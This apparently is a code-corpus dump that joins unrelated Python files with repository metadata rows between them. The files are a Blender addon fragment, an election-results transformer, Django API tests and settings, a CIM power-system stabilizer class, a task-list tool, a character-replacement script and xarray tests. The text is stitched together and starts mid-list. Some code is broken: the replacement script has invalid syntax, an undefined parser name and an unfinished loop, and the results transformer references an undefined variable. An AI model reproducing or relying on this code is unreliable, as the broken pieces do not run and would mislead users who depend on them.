('NCENTER', 'Center Normalized', '', 5),
('NBOTTOM', 'Bottom Normalized', '', 6),
('TOPMONO', 'Top Monospaced', '', 7),
('CENTERMONO', 'Center Monospaced', '', 8),
('BOTTOMMONO', 'Bottom Monospaced', '', 9)]
bpy.types.Object.retro_textpane_vjustification = bpy.props.EnumProperty(items=frame_textpane_vjustifications, name='Retro: Vertical Justification', default='TOP')
bpy.types.Object.retro_tablegroup_elem_count = bpy.props.IntProperty(name='Retro: Table Group Element Count', min=0, default=0)
bpy.types.Object.retro_tablegroup_elem_default = bpy.props.IntProperty(name='Retro: Table Group Default Element', min=0, default=0)
bpy.types.Object.retro_tablegroup_wraparound = bpy.props.BoolProperty(name='Retro: Table Group Wraparound', default=False)
bpy.types.Object.retro_group_default_worker = bpy.props.IntProperty(name='Retro: Group Default Worker', min=0, default=0)
bpy.types.Object.retro_slider_min = bpy.props.FloatProperty(name='Retro: Slider Min', default=0.0)
bpy.types.Object.retro_slider_max = bpy.props.FloatProperty(name='Retro: Slider Max', default=1.0)
bpy.types.Object.retro_slider_default = bpy.props.FloatProperty(name='Retro: Slider Default', default=0.0)
bpy.types.Object.retro_slider_increment = bpy.props.FloatProperty(name='Retro: Slider Increment', min=0.0, default=1.0)
bpy.types.Object.retro_energybar_texture_path = bpy.props.StringProperty(name='Retro: Energy Bar Texture Path')
bpy.types.Object.retro_meter_no_round_up = bpy.props.BoolProperty(name='Retro: No Round Up', default=True)
bpy.types.Object.retro_meter_max_capacity = bpy.props.IntProperty(name='Retro: Max Capacity', min=0, default=100)
bpy.types.Object.retro_meter_worker_count = bpy.props.IntProperty(name='Retro: Worker Count', min=0, default=1)
bpy.types.Light.retro_light_index = bpy.props.IntProperty(name='Retro: Light Index', min=0, default=0)
bpy.types.Light.retro_light_angle_constant = bpy.props.FloatProperty(name='Retro: Light Angle Constant', min=0.0, default=0.0)
bpy.types.Light.retro_light_angle_linear = bpy.props.FloatProperty(name='Retro: Light Angle Linear', min=0.0, default=0.0)
bpy.types.Light.retro_light_angle_quadratic = bpy.props.FloatProperty(name='Retro: Light Angle Quadratic', min=0.0, default=0.0)
|
mit
| -7,502,796,951,139,289,000
| 53.212276
| 169
| 0.586168
| false
| 3.407878
| false
| false
| false
|
lanacioncom/elecciones_2015_caba
|
backend/scripts/apitransforms.py
|
1
|
8671
|
# coding: utf-8
import logging
# TODO Remove only for testing
import json
import io
from utils import get_percentage, format_percentage, sort_results_by_percentage
from config import JSON_EXAMPLE_PATH, SPECIAL_PARTIES, PASS_THRESHOLD
from config import Paso2015
log = logging.getLogger('paso.%s' % (__name__))
PERC_KEYS = ["pct", "pct_total"]
RESUMEN_RENAME = {
'Electores': 'e',
'VotantesJef': 'v',
'Mesas': 'mt',
'MesasInformadas': 'mi',
'UltimaActualizacion': 'ut'
}
RESULTS_CAND_RENAME = {
"id_candidato": "id",
"votos": "v",
"pct": "p",
"pct_total": "pt"
}
RESULTS_PARTY_RENAME = {
"votos": "v",
"pct": "p",
"id_partido": "id",
}
RESULTS_PARTY_SUMM_RENAME = {
"votos": "v",
"pct": "p",
}
def to_json(fname=None, d=None):
'''For testing purposes'''
with io.open('%s/%s.json'
% (JSON_EXAMPLE_PATH, fname),
'w', encoding='utf8') as f:
log.debug("writing output JSON: %s.json" % (fname))
f.write(json.dumps(d, ensure_ascii=False))
def t_rename_data(d=None, translation=None, p_keys=None):
'''translate desired data'''
target_dict = {}
try:
for k, v in translation.iteritems():
if (k in p_keys):
d[k] = format_percentage(d[k])
target_dict[v] = d[k]
except KeyError, e:
log.error("Could not find required key %s in %s" % (k, d))
raise Paso2015(__name__)
return target_dict
def t_resumen_API(origin_dict=None):
'''get the desired data'''
target_dict = {}
try:
for k, v in RESUMEN_RENAME.iteritems():
target_dict[v] = origin_dict['resumen'][k]
except KeyError:
log.error("Could not find required key %s in %s" % (k, origin_dict))
raise Paso2015(__name__)
# Calculate table percentage
mp = get_percentage(target_dict, 'mi', 'mt')
target_dict["mp"] = mp
# Calculate voting percentage
vp = get_percentage(target_dict, 'v', 'e')
target_dict["vp"] = vp
return target_dict
def t_results_section_API(d=None, comuna=None, dest_dict=None):
'''Transform the received data
to the desired format'''
a99 = []
a00 = []
try:
if not comuna:
# 0 stores the global results for the election
data = d["general"][0]["partidos"]
else:
data = d["general"][0]["comunas"]["partidos"]
except (KeyError, IndexError), e:
log.error("Did not find data in memory. Reason" % (str(e)))
raise Paso2015(__name__)
try:
for idx, row in enumerate(data):
a00.append(t_rename_data(row, RESULTS_PARTY_RENAME, PERC_KEYS))
if len(row["listas"]) == 1:
# Do not include special parties inside "Listas únicas"
if row["id_partido"] not in SPECIAL_PARTIES:
a99.append(t_rename_data(row,
RESULTS_PARTY_RENAME,
PERC_KEYS))
else:
# Create transformed array for parties with many candidates
t_a = [t_rename_data(l, RESULTS_CAND_RENAME, PERC_KEYS)
for l in row["listas"]]
if not comuna:
# First time we see the party create a dictionary for it
# and append results
t_d = {"r": t_rename_data(row,
RESULTS_PARTY_SUMM_RENAME,
PERC_KEYS),
"c_%02d" % (comuna): t_a}
# Create the key for the policitical party
# inside the target dict
dest_dict["partido_%s"
% (row["id_partido"])] = t_d
else:
# For every other section
# We only need to create a section key
# with the candidates array
dest_dict["partido_%s"
% (row["id_partido"])]["c_%02d" % (comuna)] = t_a
except KeyError, e:
log.error("Error processing key. Reason %s" % (str(e)))
raise Paso2015(__name__)
except IndexError, e:
log.error("Error processing index. Reason %s" % (str(e)))
raise Paso2015(__name__)
dest_dict["partido_99"]["c_%02d" % (comuna)] = a99
dest_dict["partido_00"]["c_%02d" % (comuna)] = a00
def t_sort_results_API(d_d=None):
''' sort the results by descending percentage
taking into account special parties at the bottom'''
for k, v in d_d.iteritems():
if k == "resumen":
continue
if k == "partido_00":
sort_results_by_percentage(v, special=True)
else:
sort_results_by_percentage(v, special=False)
def t_results_API(origin_list=None, dest_dict=None):
'''main transformation
we need to switch from section based driven data
to political party driven data'''
for i, v in enumerate(origin_list):
log.debug("transform results for section %s" % (i))
t_results_section_API(v, i, dest_dict)
# Sort special party results
t_sort_results_API(dest_dict)
# Write to file to preview intermediate result
# to_json("datos_completos",dest_dict)
# QeQ candidates transformations
def t_candidates_percentage(d=None):
'''Transform candidates percentage for piece automation'''
try:
data = d[0]["general"][0]["partidos"]
except (KeyError, IndexError), e:
log.error("Error getting data from memory. Reason %s"
% (str(e)))
raise Paso2015(__name__)
result = {}
cand_list = []
for row in data:
# Skip special political parties
try:
if row["id_partido"] in SPECIAL_PARTIES:
continue
if (float(row["pct"]) >= PASS_THRESHOLD):
party_passed = True
else:
party_passed = False
# Get maximum number of votes for a party primary
max_v = int(max(row["listas"],
key=lambda x: int(x["votos"]))["votos"])
for c_d in row["listas"]:
tmp_cand = {"id": c_d["id_candidato"],
"p": format_percentage(c_d["pct_total"]),
"g": "1" if (int(c_d["votos"]) == max_v) else "0",
"pp": "1" if party_passed else "0"}
cand_list.append(tmp_cand)
except (KeyError, ValueError, IndexError), e:
log.error("Failed to get the candidate percentage. Reason: %s"
% (str(e)))
raise Paso2015(__name__)
# Order candidate list by descending percentage
cand_list.sort(key=lambda x: float(x['p']), reverse=True)
result["candidatos"] = cand_list
return result
# Front page ranking transformations
def t_ranking(d_d=None):
'''Transformation to obtain the ranking data for
the front page'''
try:
data_parties = d_d["partido_00"]["c_00"]
data_summary = d_d["resumen"]
except KeyError, e:
log.error("Error getting data from memory. Reason %s"
% (str(e)))
raise Paso2015(__name__)
result = {}
# Get the summary of avaible voting tables
result["mp"] = data_summary["mp"]
# Get the top three parties
parties_list = []
try:
for row in data_parties[0:3]:
party = {"id": row["id"], "p": row["p"]}
candidates_list = []
try:
data_primary = d_d["partido_%s" % (row["id"])]["c_00"]
for c in data_primary[0:2]:
candidates_list.append({"id": c["id"], "pt": c["pt"]})
except KeyError:
# Did not find party try over the rest of "listas únicas"
try:
data_primary = d_d["partido_99"]["c_00"]
# Inside "Listas únicas there is only one percentage"
candidates_list.append({"id": c["id"], "pt": c["p"]})
except (KeyError, ValueError, IndexError), e:
log.error("Did not find the party. Reason %s"
% (str(e)))
raise Paso2015(__name__)
party["candidatos"] = candidates_list
parties_list.append(party)
except IndexError, e:
log.error("Did not find at least 3 parties. Reason %s"
% (str(e)))
raise Paso2015(__name__)
result["partidos"] = parties_list
return result
|
mit
| 3,808,144,704,324,429,300
| 34.235772
| 79
| 0.524919
| false
| 3.675997
| false
| false
| false
|
eaudeweb/lcc-toolkit
|
lcc/tests/answer.py
|
1
|
6176
|
import json
from django.contrib.auth.models import User
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from lcc.models import (
Answer, Assessment, Country, Question
)
from lcc.serializers import AnswerSerializer
from lcc.tests.taxonomy import create_taxonomy_classication
class GetAnswersTest(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
'testuser', 'user@test.com', 'test1234')
self.client.login(username='testuser', password='test1234')
self.country = Country.objects.create(iso='ROU', name='Romania')
self.assessment = Assessment.objects.create(
user=self.user, country=self.country)
self.classification = create_taxonomy_classication()
self.question_1 = Question.objects.create(
text="Question 1 text", parent=None,
order=1, classification=self.classification)
self.question_2 = Question.objects.create(
text="Question 2 text", parent=None,
order=2, classification=self.classification)
self.question_3 = Question.objects.create(
text="Question 3 text", parent=self.question_1,
order=1, classification=self.classification)
self.question_4 = Question.objects.create(
text="Question 4 text", parent=self.question_2,
order=1, classification=self.classification)
self.answer_1 = Answer.objects.create(
assessment=self.assessment, question=self.question_1, value=True)
self.answer_2 = Answer.objects.create(
assessment=self.assessment, question=self.question_2, value=True)
self.answer_3 = Answer.objects.create(
assessment=self.assessment, question=self.question_3, value=False)
def test_get_all_answers(self):
response = self.client.get(reverse('lcc:api:answers_list_create'))
answers = Answer.objects.all()
serializer = AnswerSerializer(answers, many=True)
json_res = json.loads(response.content.decode())
json_ser = json.loads(json.dumps(serializer.data))
self.assertEqual(json_res, json_ser)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_single_answer(self):
response = self.client.get(
reverse('lcc:api:answers_get_update', args=[self.answer_1.pk]))
serializer = AnswerSerializer(self.answer_1)
json_res = json.loads(response.content.decode())
json_ser = json.loads(json.dumps(serializer.data))
self.assertEqual(json_res, json_ser)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_invalid_single_answer(self):
response = self.client.get(
reverse('lcc:api:answers_get_update', args=[100]),
expect_errors=True
)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
class CreateAnswersTest(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
'testuser', 'user@test.com', 'test1234')
self.client.login(username='testuser', password='test1234')
self.country = Country.objects.create(iso='ro', name='Romania')
self.assessment = Assessment.objects.create(
user=self.user, country=self.country)
self.classification = create_taxonomy_classication()
self.question_1 = Question.objects.create(
text="Question 1 text", parent=None,
order=1, classification=self.classification)
self.answer_valid_payload = {
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": True
}
self.answer_invalid_payload = {
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": None
}
def test_create_valid_answer(self):
response = self.client.post(
reverse('lcc:api:answers_list_create'),
json.dumps(self.answer_valid_payload),
data_type='json',
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_invalid_answer(self):
response = self.client.post(
reverse('lcc:api:answers_list_create'),
json.dumps(self.answer_invalid_payload),
data_type='json',
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
class UpdateSingleAnswer(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
'testuser', 'user@test.com', 'test1234')
self.client.login(username='testuser', password='test1234')
self.country = Country.objects.create(iso='ROU', name='Romania')
self.assessment = Assessment.objects.create(
user=self.user, country=self.country)
self.classification = create_taxonomy_classication()
self.question_1 = Question.objects.create(
text="Question 1 text", parent=None,
order=1, classification=self.classification)
self.answer_1 = Answer.objects.create(
assessment=self.assessment, question=self.question_1, value=True)
self.answer_valid_payload = {
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": not self.answer_1.value
}
self.answer_invalid_payload = {
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": None
}
def test_valid_update_answer(self):
response = self.client.put(
reverse('lcc:api:answers_get_update', args=[self.answer_1.pk]),
json.dumps({
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": False
}),
data_type='json',
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
|
gpl-3.0
| 359,729,923,295,122,600
| 37.842767
| 78
| 0.628886
| false
| 3.981947
| true
| false
| false
|
rwl/PyCIM
|
CIM14/IEC61970/Dynamics/PowerSystemStabilizers/PssIEEE2B.py
|
1
|
7134
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.IEC61970.Dynamics.PowerSystemStabilizers.PowerSystemStabilizer import PowerSystemStabilizer
class PssIEEE2B(PowerSystemStabilizer):
"""IEEE (2005) PSS2B Model This stabilizer model is designed to represent a variety of dual-input stabilizers, which normally use combinations of power and speed or frequency to derive the stabilizing signal.
"""
def __init__(self, t11=0.0, vsi1max=0.0, t3=0.0, tw3=0.0, vstmax=0.0, t2=0.0, n=0, vsi1min=0.0, t9=0.0, ks2=0.0, vstmin=0.0, j1=0, tw1=0.0, tb=0.0, t7=0.0, vsi2max=0.0, t6=0.0, t1=0.0, m=0, vsi2min=0.0, a=0.0, t4=0.0, tw4=0.0, ks4=0.0, ta=0.0, ks3=0.0, t10=0.0, tw2=0.0, j2=0, ks1=0.0, t8=0.0, *args, **kw_args):
"""Initialises a new 'PssIEEE2B' instance.
@param t11: Lead/lag time constant
@param vsi1max: Input signal #1 max limit
@param t3: Lead/lag time constant
@param tw3: First washout on signal #2
@param vstmax: Stabilizer output max limit
@param t2: Lead/lag time constant
@param n: Order of ramp tracking filter
@param vsi1min: Input signal #1 min limit
@param t9: Lag of ramp tracking filter
@param ks2: Gain on signal #2
@param vstmin: Stabilizer output min limit
@param j1: Input signal #1 code 1 shaft speed 2 frequency of bus voltage 3 generator electrical power 4 generator accelerating power 5 amplitude of bus voltage 6 derivative of bus voltage amplitude
@param tw1: First washout on signal #1
@param tb: Lag time constant
@param t7: Time constant on signal #2
@param vsi2max: Input signal #2 max limit
@param t6: Time constant on signal #1
@param t1: Lead/lag time constant
@param m: Denominator order of ramp tracking filter
@param vsi2min: Input signal #2 min limit
@param a: Numerator constant
@param t4: Lead/lag time constant
@param tw4: Second washout on signal #2
@param ks4: Gain on signal #2 input after ramp-tracking filter
@param ta: Lead constant
@param ks3: Gain on signal #2 input before ramp-tracking filter
@param t10: Lead/lag time constant
@param tw2: Second washout on signal #1
@param j2: Input signal #2 code 1 shaft speed 2 frequency of bus voltage 3 generator electrical power 4 generator accelerating power 5 amplitude of bus voltage 6 derivative of bus voltage amplitude
@param ks1: Stabilizer gain
@param t8: Lead of ramp tracking filter
"""
#: Lead/lag time constant
self.t11 = t11
#: Input signal #1 max limit
self.vsi1max = vsi1max
#: Lead/lag time constant
self.t3 = t3
#: First washout on signal #2
self.tw3 = tw3
#: Stabilizer output max limit
self.vstmax = vstmax
#: Lead/lag time constant
self.t2 = t2
#: Order of ramp tracking filter
self.n = n
#: Input signal #1 min limit
self.vsi1min = vsi1min
#: Lag of ramp tracking filter
self.t9 = t9
#: Gain on signal #2
self.ks2 = ks2
#: Stabilizer output min limit
self.vstmin = vstmin
#: Input signal #1 code 1 shaft speed 2 frequency of bus voltage 3 generator electrical power 4 generator accelerating power 5 amplitude of bus voltage 6 derivative of bus voltage amplitude
self.j1 = j1
#: First washout on signal #1
self.tw1 = tw1
#: Lag time constant
self.tb = tb
#: Time constant on signal #2
self.t7 = t7
#: Input signal #2 max limit
self.vsi2max = vsi2max
#: Time constant on signal #1
self.t6 = t6
#: Lead/lag time constant
self.t1 = t1
#: Denominator order of ramp tracking filter
self.m = m
#: Input signal #2 min limit
self.vsi2min = vsi2min
#: Numerator constant
self.a = a
#: Lead/lag time constant
self.t4 = t4
#: Second washout on signal #2
self.tw4 = tw4
#: Gain on signal #2 input after ramp-tracking filter
self.ks4 = ks4
#: Lead constant
self.ta = ta
#: Gain on signal #2 input before ramp-tracking filter
self.ks3 = ks3
#: Lead/lag time constant
self.t10 = t10
#: Second washout on signal #1
self.tw2 = tw2
#: Input signal #2 code 1 shaft speed 2 frequency of bus voltage 3 generator electrical power 4 generator accelerating power 5 amplitude of bus voltage 6 derivative of bus voltage amplitude
self.j2 = j2
#: Stabilizer gain
self.ks1 = ks1
#: Lead of ramp tracking filter
self.t8 = t8
super(PssIEEE2B, self).__init__(*args, **kw_args)
_attrs = ["t11", "vsi1max", "t3", "tw3", "vstmax", "t2", "n", "vsi1min", "t9", "ks2", "vstmin", "j1", "tw1", "tb", "t7", "vsi2max", "t6", "t1", "m", "vsi2min", "a", "t4", "tw4", "ks4", "ta", "ks3", "t10", "tw2", "j2", "ks1", "t8"]
_attr_types = {"t11": float, "vsi1max": float, "t3": float, "tw3": float, "vstmax": float, "t2": float, "n": int, "vsi1min": float, "t9": float, "ks2": float, "vstmin": float, "j1": int, "tw1": float, "tb": float, "t7": float, "vsi2max": float, "t6": float, "t1": float, "m": int, "vsi2min": float, "a": float, "t4": float, "tw4": float, "ks4": float, "ta": float, "ks3": float, "t10": float, "tw2": float, "j2": int, "ks1": float, "t8": float}
_defaults = {"t11": 0.0, "vsi1max": 0.0, "t3": 0.0, "tw3": 0.0, "vstmax": 0.0, "t2": 0.0, "n": 0, "vsi1min": 0.0, "t9": 0.0, "ks2": 0.0, "vstmin": 0.0, "j1": 0, "tw1": 0.0, "tb": 0.0, "t7": 0.0, "vsi2max": 0.0, "t6": 0.0, "t1": 0.0, "m": 0, "vsi2min": 0.0, "a": 0.0, "t4": 0.0, "tw4": 0.0, "ks4": 0.0, "ta": 0.0, "ks3": 0.0, "t10": 0.0, "tw2": 0.0, "j2": 0, "ks1": 0.0, "t8": 0.0}
_enums = {}
_refs = []
_many_refs = []
|
mit
| -6,638,819,848,225,770,000
| 42.766871
| 448
| 0.614943
| false
| 3.162234
| false
| false
| false
|
nathanielksmith/done
|
done/Tasks.py
|
1
|
2607
|
# who nate smith
# when march 2010
# why the done tool
# where midwest usa
import sys
from time import mktime, time
from datetime import datetime
import sqlite3
from termcolor import colored
import sql_interp.sql_interp as si
from Config import db_path
class Task:
def __init__(self, desc, due):
self.desc = desc
self.si = si.SQLInterp()
self.db = sqlite3.connect(db_path)
self.c = self.db.cursor()
self.due = datetime.fromtimestamp(due) if due else None
def add(self):
insert = {
"desc" : self.desc,
"created" : time()
}
if self.due:
insert["due"] = mktime(self.due.timetuple())
interped = self.si.interp("INSERT INTO tasks", insert)
self.c.execute(interped[0], interped[1])
self.db.commit()
print "\t *", self
def done(self):
sys.stdout.write("\t * " + str(self) + "? ")
answer = raw_input("[dN]:")
if answer == "d":
self.finish()
return True
return False
def remove(self):
sys.stdout.write("\t * " + str(self) + "? ")
answer = raw_input("[rmN]:")
if answer == "rm":
self.delete()
return True
return False
def finish(self):
where = { "desc":self.desc }
interped = self.si.interp("UPDATE tasks SET done=1 WHERE", where)
self.c.execute(interped[0], interped[1])
self.db.commit()
def delete(self):
where = { "desc":self.desc }
interped = self.si.interp("DELETE FROM tasks WHERE", where)
self.c.execute(interped[0], interped[1])
self.db.commit()
def pretty_due(self):
if not self.due:
return ""
due_string = self.due.strftime("%a, %Y-%m-%d %X")
overdue = lambda s: colored(s, "white", "on_red")
red = lambda s: colored(s, "red")
yellow = lambda s: colored(s, "yellow")
green = lambda s: colored(s, "green")
now = datetime.now()
delta = self.due - now
if delta.days < 0: # overdue
due_string = overdue(due_string)
if delta.days == 0:
due_string = red(due_string)
if delta.days == 1:
due_string = yellow(due_string)
if delta.days > 1:
due_string = green(due_string)
return due_string
def __str__(self):
due_string = self.pretty_due()
return "%s %s" % (self.desc, due_string)
|
gpl-3.0
| -1,143,508,511,663,373,800
| 23.59434
| 73
| 0.519371
| false
| 3.666667
| false
| false
| false
|
neil92/MiscScripts2
|
replace_every_xth_line.py
|
1
|
1281
|
#!/usr/local/miniconda3/bin/python
def setupArguments():
"""
This is the function that sets up the flags and the arguements you can pass to the script.
:author: Neil A. Patel
"""
aParser = argparse.ArgumentParser("Setup the arguments.")
aparser.add_argument('-f', '--file', action='store', dest='file_target', required=true,
help="This is the file that will have every xth character replaced.")
aparser.add_argument("-o", "--output", action='store', dest='file_output', required=true,
help="This is the file that will be outputed.")
aParser.add_argument('-c', '--character', action='store', dest="target_character", required=False,
default="\n", help="This is an argument where you can specify which character you want to replace")
aParser.add_argument("-p", "--period", action="store", dest="period", required=False,
default=2, help="The inverse of frequency. You want to replace the character every xth position.")
return aParser.parse_args()
def main():
args = setupArguments()
with open(args.file_target) as file_target:
with open(args.file_output, "w") as file_output:
number_of_times_seen = 1
for line in file_target:
if number_of_times_seen = period:
if __name__ == "__main__":
main()
|
mit
| -5,675,658,794,333,368,000
| 39.03125
| 105
| 0.674473
| false
| 3.713043
| false
| false
| false
|
bertnotbob/django-property
|
config/settings/base.py
|
1
|
4530
|
import dj_database_url, os
from django.core.exceptions import ImproperlyConfigured
def get_env_variable(var_name):
try:
return os.environ[var_name]
except:
error_msg = 'Set the {} environment variable'.format(var_name)
raise ImproperlyConfigured(error_msg)
# Paths
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Secret Key
SECRET_KEY = get_env_variable('SECRET_KEY')
# Debug
DEBUG = True
# Allowed Hosts
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'homes',
'homes_for_sale',
'homes_to_let',
'homes_user',
'homes_agent',
'homes_json',
'homes_theme_default',
'django.contrib.humanize',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.gis',
'mapwidgets',
'sorl.thumbnail',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# Wsgi
WSGI_APPLICATION = 'config.wsgi.application'
# Database
DATABASES = {
'default': dj_database_url.config(conn_max_age=500)
}
DATABASES['default']['ENGINE'] = 'django.contrib.gis.db.backends.postgis'
# Password validation
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'debug_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.path.join(BASE_DIR, '../logs/debug.log') # Place outside of app location
},
'app_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.path.join(BASE_DIR, '../logs/app.log') # Place outside of app location
},
},
'loggers': {
'django': {
'handlers': ['debug_file'],
'level': 'DEBUG',
'propagate': True,
},
'app': {
'handlers': ['app_file'],
'level': 'DEBUG',
'propagate': True,
}
},
}
# Internationalization
LANGUAGE_CODE = 'en-gb'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# AWS
AWS_STORAGE_BUCKET_NAME = get_env_variable('AWS_STORAGE_BUCKET_NAME')
AWS_ACCESS_KEY_ID = get_env_variable('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = get_env_variable('AWS_SECRET_ACCESS_KEY')
AWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME
# Static files
STATICFILES_LOCATION = 'static'
STATICFILES_STORAGE = 'config.custom_storages.StaticStorage'
STATIC_URL = "https://%s/%s/" % (AWS_S3_CUSTOM_DOMAIN, STATICFILES_LOCATION)
# Media files
MEDIAFILES_LOCATION = 'media'
MEDIA_URL = "https://%s/%s/" % (AWS_S3_CUSTOM_DOMAIN, MEDIAFILES_LOCATION)
DEFAULT_FILE_STORAGE = 'config.custom_storages.MediaStorage'
# Accounts
ACCOUNT_ACTIVATION_DAYS = 7
# User settings
LOGIN_REDIRECT_URL = '/user/dashboard/'
# Google
GOOGLE_MAPS_API_KEY=get_env_variable('GOOGLE_MAPS_API_KEY')
# Email
EMAIL_HOST = get_env_variable('EMAIL_HOST')
EMAIL_HOST_USER = get_env_variable('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = get_env_variable('EMAIL_HOST_PASSWORD')
EMAIL_PORT = get_env_variable('EMAIL_PORT')
|
mit
| 5,718,639,544,731,947,000
| 25.343023
| 99
| 0.641501
| false
| 3.498069
| true
| false
| false
|
pydata/xarray
|
xarray/tests/test_utils.py
|
1
|
10440
|
from datetime import datetime
from typing import Hashable
import numpy as np
import pandas as pd
import pytest
from xarray.coding.cftimeindex import CFTimeIndex
from xarray.core import duck_array_ops, utils
from xarray.core.indexes import PandasIndex
from xarray.core.utils import either_dict_or_kwargs, iterate_nested
from . import assert_array_equal, requires_cftime, requires_dask
from .test_coding_times import _all_cftime_date_types
class TestAlias:
def test(self):
def new_method():
pass
old_method = utils.alias(new_method, "old_method")
assert "deprecated" in old_method.__doc__
with pytest.warns(Warning, match="deprecated"):
old_method()
def test_safe_cast_to_index():
dates = pd.date_range("2000-01-01", periods=10)
x = np.arange(5)
td = x * np.timedelta64(1, "D")
midx = pd.MultiIndex.from_tuples([(0,)], names=["a"])
for expected, array in [
(dates, dates.values),
(pd.Index(x, dtype=object), x.astype(object)),
(pd.Index(td), td),
(pd.Index(td, dtype=object), td.astype(object)),
(midx, PandasIndex(midx)),
]:
actual = utils.safe_cast_to_index(array)
assert_array_equal(expected, actual)
assert expected.dtype == actual.dtype
@pytest.mark.parametrize(
"a, b, expected", [["a", "b", np.array(["a", "b"])], [1, 2, pd.Index([1, 2])]]
)
def test_maybe_coerce_to_str(a, b, expected):
a = np.array([a])
b = np.array([b])
index = pd.Index(a).append(pd.Index(b))
actual = utils.maybe_coerce_to_str(index, [a, b])
assert_array_equal(expected, actual)
assert expected.dtype == actual.dtype
def test_maybe_coerce_to_str_minimal_str_dtype():
a = np.array(["a", "a_long_string"])
index = pd.Index(["a"])
actual = utils.maybe_coerce_to_str(index, [a])
expected = np.array("a")
assert_array_equal(expected, actual)
assert expected.dtype == actual.dtype
@requires_cftime
def test_safe_cast_to_index_cftimeindex():
date_types = _all_cftime_date_types()
for date_type in date_types.values():
dates = [date_type(1, 1, day) for day in range(1, 20)]
expected = CFTimeIndex(dates)
actual = utils.safe_cast_to_index(np.array(dates))
assert_array_equal(expected, actual)
assert expected.dtype == actual.dtype
assert isinstance(actual, type(expected))
# Test that datetime.datetime objects are never used in a CFTimeIndex
@requires_cftime
def test_safe_cast_to_index_datetime_datetime():
dates = [datetime(1, 1, day) for day in range(1, 20)]
expected = pd.Index(dates)
actual = utils.safe_cast_to_index(np.array(dates))
assert_array_equal(expected, actual)
assert isinstance(actual, pd.Index)
def test_multiindex_from_product_levels():
result = utils.multiindex_from_product_levels(
[pd.Index(["b", "a"]), pd.Index([1, 3, 2])]
)
np.testing.assert_array_equal(
result.codes, [[0, 0, 0, 1, 1, 1], [0, 1, 2, 0, 1, 2]]
)
np.testing.assert_array_equal(result.levels[0], ["b", "a"])
np.testing.assert_array_equal(result.levels[1], [1, 3, 2])
other = pd.MultiIndex.from_product([["b", "a"], [1, 3, 2]])
np.testing.assert_array_equal(result.values, other.values)
def test_multiindex_from_product_levels_non_unique():
result = utils.multiindex_from_product_levels(
[pd.Index(["b", "a"]), pd.Index([1, 1, 2])]
)
np.testing.assert_array_equal(
result.codes, [[0, 0, 0, 1, 1, 1], [0, 0, 1, 0, 0, 1]]
)
np.testing.assert_array_equal(result.levels[0], ["b", "a"])
np.testing.assert_array_equal(result.levels[1], [1, 2])
class TestArrayEquiv:
def test_0d(self):
# verify our work around for pd.isnull not working for 0-dimensional
# object arrays
assert duck_array_ops.array_equiv(0, np.array(0, dtype=object))
